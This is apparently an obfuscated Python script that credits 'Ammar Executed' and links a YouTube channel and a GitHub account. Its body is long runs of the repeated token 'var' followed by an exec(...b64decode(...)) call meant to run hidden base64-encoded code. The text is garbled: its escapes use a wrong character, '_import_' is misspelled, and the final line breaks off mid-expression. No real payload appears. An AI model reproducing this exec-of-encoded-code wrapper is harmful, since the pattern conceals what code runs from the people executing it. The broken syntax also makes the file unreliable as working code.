# Encrypted by Ammar Executed
# Jangan lupa subscribe Youtube Ammar Executed
# Github- https://github.com/Lord-Ammar
# Excrypt Variable From Python
# Hayo Om Mo Ngapain:v

varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar
varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar

exec(_import_("\×62\×61\×73\×65\×36\×34") .b64decode (varvarvarvarvarvar.encode("\×75varvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvarvar.encode("\x75\x74\x66\x2d\x38")).decode